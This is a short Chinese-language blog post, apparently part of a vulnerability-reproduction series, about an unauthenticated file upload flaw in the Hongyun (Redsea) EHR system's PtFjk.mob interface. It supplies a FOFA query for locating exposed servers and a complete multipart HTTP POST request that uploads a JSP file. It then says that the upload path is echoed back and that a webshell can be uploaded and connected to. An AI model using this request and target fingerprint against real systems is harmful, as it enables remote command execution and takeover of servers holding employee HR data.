Babing
Published on 2024-08-30 / 2 Visits
0
0

H23-1红海云-EHR系统-文件上传

H23-1红海云-EHR系统-文件上传

漏洞描述:

红海云EHR系统PtFjk.mob接口处存在未授权文件上传漏洞,攻击者可上传webshell来命令执行,获取服务器权限。

网站图片:

image-20240621141415246

网络测绘:

fofa语法:

FOFA:body=“/RedseaPlatform/skins/upload/images/favicon.ico”

漏洞复现:

payload:

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

效果图:
d8556c84e2914371b120bc9058d21d05.png
回显了上传路径
验证

上传webshell

尝试连接


Comment